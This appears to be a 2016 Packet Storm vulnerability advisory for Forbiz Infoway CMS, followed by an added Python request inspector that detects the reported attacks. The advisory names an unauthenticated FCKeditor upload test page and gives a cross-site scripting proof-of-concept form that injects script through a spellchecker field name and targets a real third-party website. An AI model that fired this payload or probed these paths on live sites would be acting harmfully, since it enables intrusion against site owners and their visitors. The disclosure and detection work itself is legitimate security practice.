Forbiz Infoway CMS File Upload / Cross Site Scripting

2016-10-07T00:00:00
ID PACKETSTORM:139016
Type packetstorm
Reporter M.R.S.L.Y
Modified 2016-10-07T00:00:00

Description

                                        
`================================================================================  
Forbiz Infoway CMS - File Upload / Cross Site Scripting  
================================================================================  
# Vendor Homepage: http://www.forbiz.co.in/  
# Date: 07/10/2016  
# Author: Ashiyane Digital Security Team  
# Version: All  
================================================================================  
# PoC of File Upload (FCKeditor):  
Vulnerable page :   
http://localhost/cms/editor/filemanager/connectors/uploadtest.html  
Path of file : http://localhost/images/fck_editor_images/file.txt  
  
  
# PoC of XSS :  
<html>  
<form   
action="http://chakraayurvedicresort.com/cms/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"   
method="post">  
<input type="hidden"   
name="textinputs[1</script><script>alert(123);//</script>]" value="test">  
<input type="submit" value="xss">  
</form>  
</html>  
  
# Demo :  
  
================================================================================  
# Discovered By : M.R.S.L.Y  
================================================================================  
`
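
A server-side check for the two request patterns in this advisory, written as an added example (it is not part of the original advisory or the vendor's code). It flags requests for the FCKeditor upload test page and submissions to `spellchecker.php` whose `textinputs[...]` field name carries anything other than a decimal index. The host `example.test`, the function name `inspect_request`, the finding labels and the rule that a legitimate field name is `textinputs[<digits>]` are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

# Paths named in the advisory; suffix matching covers any install prefix.
UPLOAD_TEST_PAGE = "/editor/filemanager/connectors/uploadtest.html"
SPELLCHECKER = ("/editor/dialog/fck_spellerpages/spellerpages/"
                "server-scripts/spellchecker.php")
# Assumption: a legitimate field name is textinputs[<decimal index>].
VALID_FIELD = re.compile(r"textinputs\[\d+\]")


def inspect_request(method, url, body=""):
    """Return a list of findings for one HTTP request (empty = not flagged)."""
    findings = []
    parts = urlsplit(url)
    path = parts.path.lower()
    if path.endswith(UPLOAD_TEST_PAGE):
        findings.append("fckeditor-upload-test-page")
    if path.endswith(SPELLCHECKER):
        # Field names may arrive in the query string or a form-encoded body.
        pairs = parse_qsl(parts.query, keep_blank_values=True)
        if method.upper() == "POST":
            pairs += parse_qsl(body, keep_blank_values=True)
        for name, _value in pairs:
            # parse_qsl has already percent-decoded the name.
            if name.startswith("textinputs") and not VALID_FIELD.fullmatch(name):
                findings.append("spellchecker-bad-field-name")
                break
    return findings


# Constructed sample requests (example.test is a placeholder host).
SAMPLE_SPELL_URL = "http://example.test/cms" + SPELLCHECKER
SAMPLE_UPLOAD_URL = "http://example.test/cms" + UPLOAD_TEST_PAGE
# Field name taken from the advisory's form, form-encoded as a browser would.
SAMPLE_BAD_BODY = urlencode(
    {"textinputs[1</script><script>alert(123);//</script>]": "test"})
SAMPLE_GOOD_BODY = urlencode({"textinputs[0]": "hello world"})

if __name__ == "__main__":
    for method, url, body in [
        ("GET", SAMPLE_UPLOAD_URL, ""),
        ("POST", SAMPLE_SPELL_URL, SAMPLE_BAD_BODY),
        ("POST", SAMPLE_SPELL_URL, SAMPLE_GOOD_BODY),
    ]:
        print(method, url, inspect_request(method, url, body))
```

The same two conditions can be used as deny rules in a reverse proxy or WAF until the editor's test pages and speller server scripts are removed from the web root.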